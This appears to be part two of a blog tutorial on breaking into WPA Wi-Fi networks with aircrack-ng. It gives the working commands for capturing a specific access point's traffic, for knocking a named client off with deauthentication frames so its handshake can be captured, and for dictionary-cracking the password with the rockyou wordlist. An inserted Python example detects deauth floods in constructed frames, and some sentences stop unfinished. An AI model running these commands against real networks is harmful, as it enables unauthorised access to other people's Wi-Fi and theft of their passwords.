Cracking WiFis, the Apple way; part 2: deauth attack; cracking WPA with aircrack-ng

(Go to part 1)

Let's check the wi-fis:

# airodump-ng mon0

The Deauth attack

Now we choose which AP to attack. Let's choose Steve. The --bssid parameter selects the AP to listen to, -c fixes the channel to stay on, and -w gives the file prefix under which the captured traffic (including the handshake) is written; airodump-ng appends -01.cap to it.

# airodump-ng mon0 --bssid 00:0F:01:37:1A:A0 -c 2 -w Steve


This attack is called the Deauth attack because we de-authenticate one client and wait for it to reconnect, capturing the handshake when it does. -a is the AP's BSSID, -c the client we deauth, -0 selects the deauthentication attack, and 1 means to perform it once only.

# aireplay-ng mon0 -0 1 -a 00:0F:01:37:1A:A0 -c F0:D1:A9:AE:E7:A5


And we get the handshake.
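From the defender's side, the burst of deauthentication frames this attack produces is easy to spot in a capture. The following is an added example, not code from the original post: it parses raw 802.11 management frames (without a radiotap header) and flags any (BSSID, source, destination) triple that sends deauth/disassoc frames above a threshold. The frames, the threshold and the reason codes are constructed sample data; the two MAC addresses are the ones used on this page.

```python
import struct
from collections import Counter

# 802.11 frame type/subtype values (IEEE 802.11 frame control field).
MGMT_TYPE = 0
DEAUTH, DISASSOC, BEACON = 0xC, 0xA, 0x8

def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))

def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02X}" for x in b)

def build_mgmt_frame(subtype, dst, src, bssid, reason=7):
    """Constructed management frame: FC, duration, DA, SA, BSSID, seq ctl, then a 2-byte body."""
    fc = struct.pack("<H", (subtype << 4) | (MGMT_TYPE << 2))  # protocol version 0, no flags
    hdr = fc + struct.pack("<H", 0) + mac_bytes(dst) + mac_bytes(src) + mac_bytes(bssid) + struct.pack("<H", 0)
    return hdr + struct.pack("<H", reason)

def parse_frame(frame):
    """Return (subtype, dst, src, bssid, reason) for a management frame, else None."""
    if len(frame) < 24:
        return None
    fc, = struct.unpack_from("<H", frame, 0)
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    if ftype != MGMT_TYPE:
        return None
    dst, src, bssid = frame[4:10], frame[10:16], frame[16:22]
    reason = None
    if subtype in (DEAUTH, DISASSOC) and len(frame) >= 26:
        reason, = struct.unpack_from("<H", frame, 24)  # reason code follows the 24-byte header
    return subtype, mac_str(dst), mac_str(src), mac_str(bssid), reason

def detect_deauth_flood(frames, threshold=5):
    """Count deauth/disassoc frames per (bssid, src, dst); return the triples at or above threshold."""
    counts = Counter()
    for f in frames:
        p = parse_frame(f)
        if p and p[0] in (DEAUTH, DISASSOC):
            counts[(p[3], p[2], p[1])] += 1
    return {k: v for k, v in counts.items() if v >= threshold}

# Constructed sample: benign beacons, one client leaving on its own (reason 3),
# then a burst of deauths spoofed as coming from the AP towards one client.
AP, CLIENT, OTHER = "00:0F:01:37:1A:A0", "F0:D1:A9:AE:E7:A5", "AA:BB:CC:DD:EE:01"
SAMPLE_FRAMES = (
    [build_mgmt_frame(BEACON, "FF:FF:FF:FF:FF:FF", AP, AP)] * 10
    + [build_mgmt_frame(DEAUTH, OTHER, AP, AP, reason=3)]
    + [build_mgmt_frame(DEAUTH, CLIENT, AP, AP)] * 16
)

if __name__ == "__main__":
    for (bssid, src, dst), n in detect_deauth_flood(SAMPLE_FRAMES).items():
        print(f"possible deauth flood on {bssid}: {n} frames {src} -> {dst}")
```

A real deployment would feed frames from a monitor-mode capture and add a time window, since a handful of deauths per hour is normal roaming noise.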

Now we crack it. We will use a wordlist.

# aircrack-ng Steve-01.cap -w /pentest/passwords/wordlists/rockyou.txt


If the password is in the wordlist, then

Unfortunately this method can try only ~800 passwords per second from the wordlist, because each guess must be run through WPA's key derivation before it can be checked against the handshake. In later articles we'll see faster approaches.
